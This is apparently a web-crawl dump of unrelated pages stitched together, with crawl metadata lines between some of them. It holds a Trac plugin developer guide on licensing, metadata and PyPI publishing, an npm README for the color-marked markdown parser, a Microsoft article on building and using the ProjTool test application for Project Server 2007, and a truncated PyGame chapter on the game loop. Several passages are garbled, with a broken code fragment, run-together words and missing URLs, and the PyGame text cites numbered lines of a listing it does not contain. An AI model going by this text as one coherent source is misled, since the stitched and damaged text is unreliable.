- Add a license header to every RSS and XHTML Genshi template (example: todo).The use of the XML comment marker as shown is important, so that the text does not get rendered to the output. Make sure not to use the alternate form, which is rendered to the output as a hidden comment:
<!--! Copyright (C) YYYY-YYYY your name here <your email here> All rights reserved. This software is licensed as described in the file COPYING, which you should have received as part of this distribution. -->
<!-- This is also a comment -->
- Add a
COPYINGfile with the license text in the top-level directory of the project (example).
- Add an appropriate tag to the wiki page:
Additional tags can be created for additional or more descriptive license types.
Currently it is not recommended to add license text to static resources (ie plugin is a single
.py file that is placed in the project or shared
plugins directory. While the metadata for a packaged plugin is stored in its
setup.py file, the metadata for a single-file plugin can be added using file-scope attributes. The supported attributes and their aliases are:
author,
author_email,
url),
license,
trac and
version (
revision):
version = "$Rev$" home_page = "" license = "3-Clause BSD" author = "Joe Bloggs" author_email = "trac@python.org"
The attributes should be self-explanatory with the possible exception of the
trac attribute. The
trac attribute is used to direct bug reports to an issue tracker that differs from
home_page. If the plugin is hosted on trac-hacks.org and the
home_page attribute is set to point to the project wiki page, the
trac attribute will not need to be set.
For files stored in Subversion, Keyword Substitution is supported for the
version (
revision) attribute.
version = '$Rev$'
The file's
svn:keywords property must be edited to append
Rev. Note that the aliases
Revision,
LastChangedRevision and
HeadURL are not supported by Trac.
svn propedit svn:keywords MyAmazingMacro.py
Coding Style
Authors are encouraged to conform to the Trac Style Guide and PEP-0008 style guide.
Assert Minimum Trac Version Requirement
A common method of specifying a minimum required Trac version is to add an installation requirement in
setup.py, for example:
install_requires = ['Trac >= 0.12']. However, this causes numerous problems, some of which are documented in #9800, and is not recommended. One of the most negative consequences is that setuptools may download and install a newer version of Trac during installation of a plugin. The result can be an unintended upgrade of a user's installation (#10607).
A better approach is to place the following in the package
__init__.py, modifying
min_trac_version as appropriate for your plugin:
import pkg_resources pkg_resources.require('Trac >= 1.0')
You should still specify that Trac is an installation requirement, but without enforcing a version requirement:
install_requires = ['Trac'].
The check in
__init__.py is'))")
Documenting required and optional components
The docstring for a Component class is displayed as the Component description on the plugin admin panel.
It is recommended that the description be prefixed with
[required] or
[optional], to guide end-users in enabling the proper Components. The
[extra] descriptor can also be used for features that have specialized or narrow use-cases.
If your plugin ships with other code, such as jQuery or a Python library, then mention this in your plugin description.
Publishing Packages to PyPI
There are no strict rules on how you should publish your packages to PyPI, but for those unfamiliar with the process we present some recommendations. Most Trac plugins contain only Python code and static assets, and therefore packages can be published in a platform and Python-version independent wheel format. It is also recommended that you publish your package in the
sdist (tarball) format. There is also a list of all Trac plugins that have been published to PyPI.
- Register yourself an account on PyPI.
- Install twine and add your credentials to
.pypircin your home directory. Example:
[distutils] index-servers = pypi pypi-test [pypi] repository = username = myusername password = mypassword [pypi-test] repository = username = myusername password = mypassword
- Name your package appropriately. The package name is specified with the
nameargument in
setup.py. It is recommended that you prefix your package name with
Trac, for easy identification and to reduce the likelihood of a package name collision with an existing PyPI package. For example, FullBlogPlugin is given the name
TracFullBlog, and TagsPlugin is given the name
TracTags.
- Update dependencies in your environment:
$ pip install -U pip setuptools wheel
- From a checkout of your source code, run:
$ python setup.py sdist bdist_wheel
- Register your package on PyPI.
$ twine register dist/*.whl
- Publish your packages.
$ pip install -U twine $ twine upload dist/*.whl dist/*.tar.gz
Some thing to be aware of:
- Once a package is published to PyPI the package cannot be republished without changing the package version. You can simply bump the version or add a post release number.
- You may wish to first publish to
pypi-test, particularly if you aren't familiar with the process. Once you establish that the package can be installed from pypi-test, you can publish to pypi. Note that you have to register separately for pypi-test, and specify the server name in
twinecommands.
$ twine upload dist/*.whl dist/*.tar.gz pypi-test
- Once you take ownership of a package name on PyPI there is no process for transferring ownership of the package that can happen independent of you (see PEP:0541). This is a frequent cause of abandoned packages on PyPI, where the original owner is not reachable and a new maintainer of the package cannot update the published package. For that reason, please consider giving ownership of the package to other users in case you someday decide to no longer maintain the package. For example, you could give ownership to the TracHacks admins.
Further reading: | https://trac-hacks.org/wiki/DevGuide | CC-MAIN-2018-05 | refinedweb | 1,190 | 55.74 |
color-marked
markdown parser with highlight and inline code style support, useful for writing email with markdown
npm install color-marked
marked
Markdown parser with code hightlight form highlight.js and optional inline color support. It could be useful when you want to colorful your code in your email.
Options
See orignal README to get understand of most options.
Addtional options include
color and
colorscheme
colorparse the css file and add inline color for the code element.
colorschemewhich colorscheme to use, see highlight.js demo to get all the colorschemes and supported languages.
The value of
langPrefixwas changed to
language-
Browser support
import css file is required to display colors.
When used in browser, import highlight.js file before marked.js file and make sure function
window.hljsis availabel for converting.
Use function
marked(src, option)for markdown converting.
Component support
Install by using component command.
Syntax highlight is enable by default, default colorscheme is
solarized_light.
component install chemzqm/marked
Usage Example:
var marked = require('marked'); console.log(marked('**This** is marked for [component]()'));
Javascript API usage
// Set default options marked.setOptions({ gfm: true, tables: true, breaks: false, pedantic: false, sanitize: true, smartLists: true, smartypants: false, langPrefix: 'language-', highlight: function(code, lang) { if (lang === 'js') { return highlighter.javascript(code); } return code; } }); console.log(marked('i am using __markdown__.'));
You also have direct access to the lexer and parser if you so desire.
var tokens = marked.lexer(text, options); console.log(marked.parser(tokens));
var lexer = new marked.Lexer(options); var tokens = lexer.lex(text); console.log(tokens); console.log(lexer.rules);
$ node > require('marked').lexer('> i am using marked.') [ { type: 'blockquote_start' }, { type: 'paragraph', text: 'i am using marked.' }, { type: 'blockquote_end' }, links: {} ]
Running Tests & Contributing
If you want to submit a pull request, make sure your changes pass the test suite. If you're adding a new feature, be sure to add your own test.
The marked test suite is set up slightly strangely:
test/new is for all tests
that are not part of the original markdown.pl test suite (this is where your
test should go if you make one).
test/original is only for the original
markdown.pl tests.
test/tests houses both types of tests after they have been
combined and moved/generated by running
node test --fix or
marked --test
--fix.
In other words, if you have a test to add, add it to
test/new/ and then
regenerate the tests with
node test --fix. Commit the result. If your test
uses a certain feature, for example, maybe it assumes GFM is not enabled, you
can add
.nogfm to the filename. So,
my-test.text becomes
my-test.nogfm.text. You can do this with any marked option. Say you want
line breaks and smartypants enabled, your filename should be:
my-test.breaks.smartypants.text.
To run the tests:
cd marked/ node test
Contribution and License Agreement
If you contribute code to marked, you are implicitly allowing your code to be
distributed under the MIT license. You are also implicitly verifying that all
code is your original work.
</legalese>
License
MIT | https://www.npmjs.org/package/color-marked | CC-MAIN-2014-10 | refinedweb | 515 | 60.82 |
Mashing code from a few different sources I am trying to make a python chat client. I can connect to the server but I want to use two threads so I can send and recieve messages at the same time. I am new to python and cannot get my threads to work. My python version is 2.7.5
#!/usr/bin/python
import sys
import socket
import time
import threading
# Define a function for the thread
def sendChat( socket, name):
userInput = ""
while userInput != "exit":
userInput = raw_input("What do you want to say")
userInput = (userInput+'\r\n')
socket.send(userInput)
socket.close
print "Hello, Python!"
userName = raw_input("What would you like your user name to be:")
print (userName + " welcome to chatclient, connecting to server now...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
host = socket.gethostname() # Get local machine name
port = 4444
s.connect((host, port))
print "... connected to server!"
try:
thread.start_new_thread( sendChat, (s, "sendChat" ) )
except:
print "Error: unable to start thread"
time.sleep(100)
Ryans-MacBook-Pro:network ryan$ python chatclient.py
Hello, Python!
What would you like your user name to be:ryan
ryan welcome to chatclient, connecting to server now...
... connected to server!
Error: unable to start thread
Well, with the code exactly as given, your catch-all
try/except is hiding the obvious cause. If I remove the
try/except, I get:
Traceback (most recent call last): File "ga.py", line 26, in <module> thread.start_new_thread( sendChat, (s, "sendChat" ) ) NameError: name 'thread' is not defined
Obvious, yes? You didn't import the
thread module, so of course calling
thread.start_new_thread() can't possibly work (you imported
threading instead - which you should be using instead of the low-level
thread module). | https://codedump.io/share/8lv1bglCY3ir/1/python-thread-not-starting | CC-MAIN-2018-09 | refinedweb | 284 | 68.97 |
$…
Pinduoduo is a new prominent social e-commerce company in China.
On July 26, 2018, this three-year-old company listed on NASDAQ. Pinduoduo has achieved tremendous success in business over the past few years and is currently worth $197B. It earns a lot of money.
At the same time, it is the most evil IT company in China. The working environment of Pinduoduo seems like a sweatshop. They give extra money to buy employees’ dignity and life, and they don’t hesitate to damage others for their own interest.
On December 29, 2020, at 1 a.m., a 23-year-old female employee of Pinduoduo finally…
Python is a language I like very much, and it is also hot right now. In this post, I will list some Python books for beginners and experienced programmers who are interested in Python.
Let’s start from beginner to expert levels.
With Python and Java being so hot in the IT industry these days, if you’re still in school or you have ambitions for programming, I’d recommend settling down to learn C.
If you haven’t know anything about C, learning some of the basics will suffice. Try to figure out what people complain about it and the simplicity of the design and abstraction.
You’ll benefit from it for the rest of your computing life, and the knowledge will help you much in your programming career!
C language is one of the oldest programming languages and it has gone through almost half…
Debugging is a fundamental skill for programmers, it’s a craft and we need to practice to be better at it. Here, I summarized the useful tricks and tools for debugging your Python code.
Know the details of implementation is critical in debugging. When you are debugging a Python code, you may want to know the source code of a module, class, method, function, traceback, frame, or code object. The inspect module will help you:
import inspect
def add(x, y):
return x + yclass Dog:
kind = 'dog' # class variable shared by all instances
def __init__(self, name):
self.name …
Microsoft has made great efforts to improve the user experience and build an active ecosystem for developers. Moreover, Microsoft has completely embraced open source in recent years. There are so many awesome open source projects developed by Microsoft.
After eight years of daily work on a Mac, I recently switched to Windows 10. My previous impression was that Windows was not developer-friendly and efficient compared to Mac.
But I don’t miss my Mac and may get some shiny development experience on Windows 10. Within two weeks of exploration, I found the following five tools that can greatly improve my productivity.
After nearly 10 years of programming, I found some interesting and common lies told by developers. We unconsciously tell these lies to others or even to ourselves.
If you are a manager, product owner, girlfriend, or any other role who will cooperate with a developer, keep an eye!
TODO seems vital for some development processes.
Simply, TODO means something important but not urgent will be completed some days later, such as adding comments for code, handling exceptions, refactoring, etc.
Sadly, in most cases, TODO means we won’t do it forever.
The Linux codebase currently has over 4k TODO comments, many…
MapReduce is a computing model for processing big data with a parallel, distributed algorithm on a cluster.
It was invented by Google and has been largely used in the industry since 2004. Many applications are based on
MapReduce, such as distributed pattern-based searching, distributed sorting, web index system, etc.
MapReduce is inspired by the
map and
reduce functions, which are commonly used in functional programming.
Map and
Reduce are not new programming terms. They are operators that come from Lisp, which was invented in 1956.
Let’s begin with these operators in a programming language and then move on to
MapReduce…
Steve Jobs left the world for almost ten years. Recently, I watched a short Youtube video which reminded me of the wisdom assets from Steve.
If you haven’t watched it, here it is.
At the 1997 WWDC Apple Developer Conference, a programmer publicly humiliated Steve Jobs for not knowing some fancy technologies.
The question from this developer is:
I would like, for example for you to express in clear terms, how Java in any of its incarnations addresses the ideas embodied in OpenDoc. …. Write stuff about programming languages, algorithms, and architecture. | https://medium.com/@coderscat | CC-MAIN-2021-10 | refinedweb | 749 | 63.49 |
The ProjTool test application source code in the Microsoft Office Project 2007 SDK download includes examples that use the Project, Resource, LookupTable, CustomFields, QueueSystem, Archive, Events, Security, and Admin Web services of the Project Server Interface (PSI). ProjTool is useful for creating data in a test installation of Microsoft Office Project Server 2007 and for examining how the PSI methods work. (The ProjTool source code was contributed by Robert Kennedy Murugan, Microsoft Corporation.)
The ProjTool source code and solution files for Microsoft Visual Studio 2005 are included in the Project 2007 SDK download. The source code language is Microsoft Visual C#. This article describes how to compile the ProjTool application and use the application's main features. This article does not explain most of the ProjTool code or how to use the PSI and datasets. For a link to the Project 2007 SDK download, see Welcome to the Microsoft Office Project 2007 SDK. For more information about using the PSI, see Working with the PSI and DataSets.
The ProjTool application is designed to be used only on a test installation of Project Server. ProjTool is not supported for use on a production server. ProjTool can easily delete or change data in the Draft and Published databases, as well as reset the Project Server Queuing Service, Project Server Eventing Service, and Internet Information Services (IIS), and restart Microsoft SQL Server.
The main purpose of ProjTool is to provide developers with a way to quickly populate the Project Server databases with data in a test installation so that they can more easily develop other applications. You can see how to use some of the PSI and DataSet methods that are at the heart of Project Server development. You can also learn about program flow and the state of variables and datasets by setting breakpoints in the source code while running the application. ProjTool does not use all of the PSI Web services or all of the methods in any one Web service, but it does provide a base for a fairly comprehensive test application.
This article includes the following sections:
Compiling ProjTool
Basic Operation of ProjTool
Saving Settings for Forms Authentication and Impersonation
Using the ProjTool Main Window
Creating Projects
Modifying Project Data
LookupTables
Managing Event Handlers
Using Impersonation in ProjTool
We recommend that you back up all of the Project Server databases before you run ProjTool, and make additional database back up files after you create strategic sets of data. The source files include the CleanDBRestore.cmd script that you can use to quickly restore the Project Server database from backup files. Before you use the script, be sure to edit it to match your database names, file names, and locations.
Compiling ProjTool

The Project SDK download installs the ProjTool files by default in C:\2007 Office System Developer Resources\Project 2007 SDK\Code Samples\ProjTool. You can develop ProjTool on the Project Server test computer or on a remote development computer.
Whenever you install an updated build of Project Server, you must perform the following procedure.
To compile ProjTool:
Start Visual Studio 2005, and then open the ProjTool.sln solution file. Open Solution Explorer, and then expand the ProjTool project and the References and Web References nodes.
If you are developing on a remote computer, perform the following steps to ensure that ProjTool uses the same library assembly that Project Server uses.
Delete the Microsoft.Office.Project.Server.Library reference.
Create the directory C:\2007 Office System Developer Resources\Project 2007 SDK\Assemblies, for example, to keep assemblies you need to compile samples in the Project SDK.
Copy the Microsoft.Office.Project.Server.Library.dll assembly from your test Project Server computer to your development computer. The assembly is located in the [Program Files]\Microsoft Office Servers\12.0\Bin directory on the Project Server computer.
Re-add the assembly as a reference in the ProjTool Visual Studio project.
To ensure that Visual Studio creates Web service proxy assemblies that match your installed build of Project Server, delete and re-create the twelve Web references for the PSI. Right-click the ProjTool project node in Solution Explorer, and then click Add Web Reference. For the AdminWebSvc reference, for example, type http://ServerName/_vti_bin/psi/admin.asmx, click Go, and then type the Web reference name exactly as it was previously. The namespace must match its usage in the source code. Add all of the following Web references:
AdminWebSvc
ArchiveWebSvc
CalendarWebSvc
CustomFieldsWebSvc
EventsWebSvc
LoginFormsWebSvc
LoginWindowsWebSvc
LookupTableWebSvc
ProjectWebSvc
QueueSystemWebSvc
ResourceWebSvc
SecurityWebSvc
If you change the server name, open the ProjTool Settings page (on the Project menu, click ProjTool Properties, and then click the Settings tab on the left). Change ServerName to the name of your Project Server computer in all of the values; for example, http://ServerName/_vti_bin/psi/admin.asmx. Also do a case-sensitive search in all project files for the old server name and replace it with the new server name.
Compile ProjTool (press F6).
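After a successful build, you can verify that the regenerated proxies work by instantiating one of them directly. The following C# sketch is illustrative only and is not part of ProjTool itself; the ProjTool.AdminWebSvc namespace is an assumption that follows from the Web reference names above, and ServerName is a placeholder for your test server.

```
// Hypothetical verification snippet (not part of ProjTool itself).
// The namespace matches the AdminWebSvc Web reference created earlier.
using System;
using System.Net;

class ProxyCheck
{
    static void Main()
    {
        ProjTool.AdminWebSvc.Admin admin = new ProjTool.AdminWebSvc.Admin();

        // Point the proxy at your test server, and use the logged-on
        // Windows account for authentication.
        admin.Url = "http://ServerName/_vti_bin/psi/admin.asmx";
        admin.Credentials = CredentialCache.DefaultCredentials;

        Console.WriteLine("Proxy ready: " + admin.Url);
    }
}
```

If the Web references were re-created correctly, this compiles without errors; any call on the proxy then goes to your test server.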
Basic Operation of ProjTool

When you run ProjTool.exe, you can log on with Windows or Forms authentication. Before you log on with Forms authentication or use impersonation, you must save the settings. For information about impersonation, see Using Impersonation in ProjTool.
You can also log on using a Secure Sockets Layer (SSL) URL, for example, if Project Server is set up for that.
Sometimes a logon fails on the first attempt, with a message such as ReadProjectsList call failed. If the first attempt fails, a second logon usually fixes the problem, after ProjTool saves the URL and other user settings.
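Under the covers, the project grid is populated by a read call on the Project Web service. The following sketch shows the general shape of that call with Windows authentication; the namespace, URL, and exact method name are assumptions (the PSI exposes the project list through a method such as ReadProjectList), so check them against your generated ProjectWebSvc proxy.

```
// Hypothetical sketch of reading the project list (the call behind
// the ProjTool grid). Namespace and URL are assumptions; check the
// exact method name against your generated ProjectWebSvc proxy.
using System;
using System.Net;

class ProjectListDemo
{
    static void Main()
    {
        ProjTool.ProjectWebSvc.Project project =
            new ProjTool.ProjectWebSvc.Project();
        project.Url = "http://ServerName/_vti_bin/psi/project.asmx";
        project.Credentials = CredentialCache.DefaultCredentials;

        // Returns a ProjectDataSet; its Project table holds one row
        // per project and is the data behind the ProjTool grid.
        ProjTool.ProjectWebSvc.ProjectDataSet projects =
            project.ReadProjectList();
        Console.WriteLine("Projects: " + projects.Project.Count);
    }
}
```

If this call fails on the first logon attempt, retrying after ProjTool saves the URL and user settings usually succeeds, as noted above.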
Saving Settings for Forms Authentication and Impersonation

A ProjTool user must have a Project Server account with the same name and authentication type. The ProjTool - Project Server Logon dialog box has a Save Settings link for logging on and impersonation. You can save the settings before or after you log on.
To save settings for Forms authentication and impersonation:
Click Windows for the authentication type, type the URL of your test instance of Project Web Access, and then click Logon. ProjTool opens and shows a list of all of the projects in a grid with data from the ProjectDataSet.Project table.
On the Options menu, click Settings.
In the ProjTool Settings dialog box (Figure 1), type the Project Server URL, for example, http://ServerName/PWA, where PWA is the name of the Project Web Access instance.
Type the name and password of the user for Forms authentication you will use most often. For example, type Administrator.
Add the port settings. The default port for Windows authentication in Project Web Access is 80. The default port for Forms authentication is 81. For example, after you configure Project Web Access for Forms authentication, a typical sign-in page is http://ServerName:81/PWA.
To use impersonation, apply the following settings.
Impersonation port: This is the port for the Shared Services Provider (SSP), and the default value is 56737. To locate the value for Project Web Access on your test Project Server computer, open Internet Information Services (IIS) Manager, and then expand the Web Sites node. Right-click the Office Server Web Services node, and then click Properties. On the Web Site tab, use the TCP Port value.

Impersonation site: This is the name of the SSP site, and the default name is SharedServices1.

Site ID (GUID): The site ID for Project Web Access. Determine the site ID by performing the following steps:
Open the SharePoint 3.0 Central Administration page, click the Application Management tab, and then click Create or Configure this farm's shared services.
Click the SSP site name, for example Shared Services1 (Default). On the Shared Services Administration page, click Project Web Access Sites in the Project Server section.
For the Project Web Access instance you want, pause the mouse pointer over the URL, for example, http://ServerName/PWA, click the down arrow on the right side of the field, and then click Edit.
Copy the GUID in the id=[GUID] URL option for the Edit Project Web Access Site page, and paste the GUID into the Site ID (GUID) text box in the ProjTool Settings dialog box. (The port in the Edit Project Web Access Site page URL is the port for the Shared Services Administration site.)
You can also find the Project Web Access instance GUID in the WSS_Content database for the SSP. Open SQL Server Enterprise Manager, expand the WSS_Content_[GUID] database that contains the SSP sites, right-click the Webs table, and then open the table to return all rows. For the site with the FullUrl value PWA, for example, copy the SiteId field. Remove the braces after you paste the GUID into ProjTool Settings.
Click Save and Close.
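If you prefer to script the database lookup described in step 6, a query on the Webs table returns the same SiteId value. The following C# sketch is an assumption-laden illustration: the server name, the WSS_Content catalog name, and the PWA site path are placeholders, and you must substitute the actual WSS_Content_[GUID] database name for your farm.

```
// Hypothetical lookup of the Project Web Access site GUID from the
// SSP content database. All server, database, and site names below
// are placeholders for your test installation.
using System;
using System.Data.SqlClient;

class SiteIdLookup
{
    static void Main()
    {
        string connStr = "Data Source=ServerName;" +
            "Initial Catalog=WSS_Content;Integrated Security=SSPI";

        using (SqlConnection conn = new SqlConnection(connStr))
        {
            conn.Open();
            SqlCommand cmd = new SqlCommand(
                "SELECT SiteId FROM Webs WHERE FullUrl = @fullUrl", conn);
            cmd.Parameters.AddWithValue("@fullUrl", "PWA");

            Guid siteId = (Guid)cmd.ExecuteScalar();

            // ProjTool Settings expects the GUID without braces; the
            // "D" format prints 32 digits separated by hyphens only.
            Console.WriteLine(siteId.ToString("D"));
        }
    }
}
```

Printing with the "D" format saves the step of manually removing the braces after pasting.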
Using the ProjTool Main Window

The menu in the ProjTool main window includes the following items:
File: Log on as a different user, or log on using impersonation.

New: Create projects, projects from templates, custom fields, and enterprise resources.

LookupTable: Create a simple lookup table or a multilanguage lookup table, display lookup table values, and set languages to use for multilanguage lookup tables on the Project Server test computer.

Events: Shows the Registered Project Server Event Handlers dialog box, where you can add or delete event handlers if ProjTool is running on the Project Server computer.

Tools: Submenu items link to utilities that get an error description, reset the Project Server Queuing or Eventing services, restart SQL Server, reset IIS, or reset all services. ProjTool should be running on the Project Server computer.

Options: Refresh the grid or clear the status messages. The Settings submenu brings up the ProjTool Settings dialog box (Figure 1).

Help: Brings up the About ProjTool dialog box.
In addition to the menu items, the main window shows a series of action buttons above the project data grid (Figure 2). The buttons perform the following actions:
Delete Project Deletes one or more selected projects from both the Published and Draft databases.
Checkin Project(s) Enables you to select a simple or forced check-in of the selected projects. You can use forced check-in if a project is checked out by another user or with a different session ID.
Checkout Project(s) Enables you to check out one or more selected projects in the ProjTool main window, and check them in by using the Checkin Project(s) button. However, the session ID is not valid for checking in projects using another window, such as Project Details.
Publish Project(s) Saves projects from the Draft to the Published database. The publish process in ProjTool does not create or modify a project workspace. You can add that capability in ProjTool with additional user interface components and logic for the QueuePublishProject method. For more information about project workspaces, see How to: Create a Project Workspace and Link it to a Project.
Read Project Details Shows a dialog box with the entire ProjectDataSet data for the selected project (Figure 4). You can add tasks and make changes in the data.
If you check out the project in the main ProjTool window, and then edit data in the Project Details dialog box, you get an error when you update the data. The project is already checked out using a different session ID.
Rename Project Renames the selected project in the Draft and Published databases.
Backup / Restore Opens a dialog box that allows you to save a snapshot of each selected project in the Draft database to the Archive database. You can also restore projects from the Archive database to the Draft database.
Refresh Executes the ReadProjectsList method to repopulate the grid.
Exit Exits ProjTool.
The text box at the bottom of the main window records the status of actions, with the most recent at the top. The text box also shows XML data from SOAP errors. The status bar at the bottom of the main window shows the Project Server version number and the current date and time.
The Project Server version number shown in the status bar in Figure 2 is a build before Service Pack 1 (SP1) was released. The RTM version is 12.0.4518.1016 and the SP1 build is 12.0.6218.1000.
The Project Details dialog box in ProjTool shows the file version of the Microsoft.Office.Project.Server.Library.dll assembly. The status bar in the main ProjTool window shows the Project Server version from the ReadServerVersion PSI method. The file version of SP1 updates of Project Server assemblies is 12.0.6211.1000. The SP1 version of Microsoft Office Project Professional 2007 is also 12.0.6211.1000.
To create one or more test projects, click Projects on the New menu in the ProjTool main window. Figure 3 shows the Create ServerSide Projects dialog box. In addition to creating multiple projects, you can optionally add tasks to each project; create and add local resources of types Work, Material, and Cost; and publish the projects.
If the project name prefix is Proj and you create two projects, ProjTool increments the project names as Proj1 and Proj2.
The Project type drop-down list shows all types in the ProjectType enumeration. The only valid project types the PSI can create are Project (a standard project), Template, LightweightProject (project proposal), MasterProject, and InsertedProject. The other project types are for internal use. The enumeration value appears to the right of the drop-down list.
When you click Create Projects and then Close, the ProjTool main window shows the new projects in the grid.
To see the Project Details dialog box, select one project in the ProjTool main window grid, and then click Read Project Details (Figure 4).
The grid tabs show every DataTable in the ProjectDataSet for the project. For example, click the Task tab to show data in the TaskDataTable. The first task is the project summary task (TASK_ID = 0). If the project is not already checked out, you can add and delete tasks and set task properties. When you are finished making changes, click Update, and then click Checkin Project.
The Save DataSet to XML button saves an XML file that contains the complete contents of the ProjectDataSet that you can see in the grid tabs. To see only one field, type the field name in the Filter fields by text box. For example, type task_name; the action is case-insensitive.
To use local resources, click Add Assignment. To use enterprise resources, click Build Team.
The LookupTable menu in the ProjTool main window contains the following items.
Simple LookupTable Displays the Create and Manage LookupTables dialog box, and shows all of the data in the LookupTableDataSet in a grid with tabs for the datatables (LookupTables, LookupTableMasks, LookupTableTrees).
MultiLanguage LookupTable Creates multilanguage lookup tables for testing.
Display LookupTable Values Shows values in multilanguage lookup tables.
Set Server Language Creates Project Server database tables that can hold multilanguage lookup table data, for testing purposes (Figure 5).
You can check out, modify, update, and delete lookup tables in the Create and Manage LookupTables dialog box. With the Load Assembly and Create LT from Assembly buttons, you can open a Microsoft .NET Framework assembly and create a lookup table for testing purposes using the assembly namespace.
You can create multilanguage lookup tables on a test Project Server installation. ProjTool allows you to simulate installing multiple language database tables on the server for testing purposes. It is not necessary to install Project Server language packs to test creating multilanguage lookup tables. The languageList variable in ProjTool contains the list of active Project Server languages.
Do not run the lookup table actions, set languages, or make any changes with ProjTool on a production installation of Project Server.
To create and view a sample multilanguage lookup table:
Click Set Server Language on the LookupTable menu in the ProjTool main window.
In the Language Installer dialog box (Figure 5), check another language in addition to the Project Server primary language in Add/Remove languageList. For example, click English and French.
Type the name of the Sql Server instance that Project Server uses and set the logon properties.
Click Get DataBase List to show the list of databases.
Select the Published database in the drop-down list for the Project Web Access instance you are using.
Click Save. ProjTool creates the necessary database tables and restarts IIS. You can see the current installed languages in the list. Click Close.
Click MultiLanguage LookupTable in the LookupTable menu.
In the Create Multi-Language Lookup Tables dialog box, type a name for the lookup table. For example, type LangTest.
Select the primary LCID, for example 1033.
Check the languages you want in the Installed languages list; for example, check English and French.
Type 2 for the Number of Levels; 3 for the Values for each level; and 4 for the Values length.
Click Create and then click Close.
Click Display LookupTable Values in the LookupTable menu.
Select the lookup table in the drop-down list. For example, select LangTest.
Select the language in the drop-down list, and then click Get Values.
ProjTool creates sample characters in the LT_VALUE_TEXT field, where the number of characters is the values length and the characters are valid in the languages you used. For example, the value of the first English node is ÂÞæÛ eng 1033 and the value of the same node in French is ÂÞæÛ fra 1036.
ÂÞæÛ eng 1033
ÂÞæÛ fra 1036
To see the structure of the multilanguage lookup table that you created in ProjTool, open it in Project Web Access. On the Server Settings page, click Enterprise Custom Field Definition. On the Custom Fields and Lookup Tables page, for example, click LangTest. Project Web Access.
The ProjTool main window includes the Events menu item to help manage Project Server event handlers on a test computer. The tsEvents_Click handler for the Events menu item brings up the Registered Project Server Event Handlers dialog box.
When you click Add or Delete, ProjTool checks whether it is running on the Project Server computer. ProjTool can manage events only when it runs on the Project Server computer, because it must read and install the event handler assembly in the global assembly cache and then reset IIS.
To register a Project Server event handler, you must either register the handler assembly in the GAC or copy it to the C:\Program Files\Microsoft Office Servers\12.0\Bin\ProjectServerEventHandlers directory on the Project Server computer. In the Add Project Server Event Handlers dialog box, paste the complete reference to the event handler assembly into the textbox. For example, paste the following:
C:\Program Files\Microsoft Office Servers\12.0\Bin\ProjectServerEventHandlers
TestEventHandler, Version=1.0.0.0, Culture=Neutral, PublicKeyToken=1e3db2b86a6e0210
For more information about creating and registering Project Server event handlers, see How to: Write and Debug a Project Server Event Handler.
Because ProjTool is designed for test and development purposes only, impersonation in ProjTool requires that the user's Windows credentials match the SSP service credentials for the Project Web Access instance.
To see the SSP service credentials, open the SharePoint 3.0 Central Administration page, and then navigate from the Application Management page to the Manage this Farm's Shared Services page. Pause the mouse pointer over the SSP name (for example, SharedServices1), click the down arrow, and then click Edit Properties. For more information about developing impersonation applications, see Using Impersonation in Project Server.
To use impersonation in ProjTool, in the File menu, click Logon As. In the Project Server Advanced Logon dialog box, you can set the site ID of the Project Web Access instance and select a name from the list of enterprise resources in the drop-down list (Figure 6). When you impersonate an enterprise resource to log on, you gain the permissions of that user. This is useful for testing security for applications that integrate with Project Server. | http://msdn.microsoft.com/en-us/library/aa494895.aspx | crawl-002 | refinedweb | 3,305 | 63.49 |
17. PyGame
PyGame is a package that is not part of the standard Python distribution, so if you do not
already have it installed (i.e. import pygame fails),
download and install a suitable version from the PyGame website.
These notes are based on PyGame 1.9.1, the most recent version at the time of writing.
PyGame comes with a substantial set of tutorials, examples, and help, so there is ample opportunity to stretch yourself on the code. You may need to look around a bit to find these resources, though: if you’ve installed PyGame on a Windows machine, for example, they’ll end up in a folder like C:\Python31\Lib\site-packages\pygame\ where you will find directories for docs and examples.
17.1. The game loop
The structure of the games we’ll consider always follows this fixed pattern:
In every game, in the setup section we’ll create a window, load and prepare some content, and then enter the game loop. The game loop continuously does four main things:
- it polls for events — i.e. asks the system whether events have occurred — and responds appropriately,
- it updates whatever internal data structures or objects need changing,
- it draws the current state of the game into a (non-visible) surface,
- it puts the just-drawn surface on display.
This program pops up a window which stays there until we close it:
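A minimal program of this kind looks something like the following sketch. (The line numbers discussed below refer to the book's own listing, so they will not match this sketch exactly; the rectangle and colors here are illustrative choices.)

```python
import pygame

def main():
    """Open a window and keep it on display until the user closes it."""
    pygame.init()                     # prepare the pygame module for use
    surface_sz = 480                  # desired physical surface size, in pixels

    # Create surface of (width, height), and its window.
    main_surface = pygame.display.set_mode((surface_sz, surface_sz))

    small_rect = (300, 200, 150, 90)  # (x, y, width, height) of a small rectangle
    some_color = (255, 0, 0)          # a color is a mix of (red, green, blue)

    while True:
        ev = pygame.event.poll()      # poll for any waiting event
        if ev.type == pygame.QUIT:    # window close button clicked?
            break                     # leave the game loop

        # Update your game objects and data structures here...

        # Redraw everything from scratch on each frame:
        # first fill the whole surface with a background color,
        main_surface.fill((0, 200, 255))
        # then overpaint a smaller rectangle in another color.
        main_surface.fill(some_color, small_rect)

        # The back buffer is ready, so put it on display.
        pygame.display.flip()

    pygame.quit()                     # close the window and clean up
```

Call main() to run it; closing the window ends the loop.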
PyGame does all its drawing onto rectangular surfaces. After initializing PyGame at line 5, we create a window holding our main surface. The main loop of the game extends from line 15 to 30, with the following key bits of logic:
- First (line 16) we poll to fetch the next event that might be ready for us. This step will always be followed by some conditional statements that will determine whether any event that we’re interested in has happened. Polling for the event consumes it, as far as PyGame is concerned, so we only get one chance to fetch and use each event. On line 17 we test whether the type of the event is the predefined constant called pygame.QUIT. This is the event that we’ll see when the user clicks the close button on the PyGame window. In response to this event, we leave the loop.
- Once we’ve left the loop, the code at line 32 closes the window, and we’ll return from function
main. Your program could go on to do other things, or reinitialize pygame and create another window, but it will usually just end too.
- There are different kinds of events — key presses, mouse motion, mouse clicks, joystick movement, and so on. It is usual that we test and handle all these cases with new code squeezed in before line 19. The general idea is “handle events first, then worry about the other stuff”.
- At line 20 we’d update objects or data — for example, if we wanted to vary the color, position, or size of the rectangle we’re about to draw, we’d re-assign some_color and small_rect here.
- A modern way to write games (now that we have fast computers and fast graphics cards) is to redraw everything from scratch on every iteration of the game loop. So the first thing we do at line 24 is fill the entire surface with a background color. The fill method of a surface takes two arguments — the color to use for filling, and the rectangle to be filled. But the second argument is optional, and if it is left out the entire surface is filled.
- In line 27 we fill a second rectangle, this time using
some_color. The placement and size of the rectangle are given by the tuple
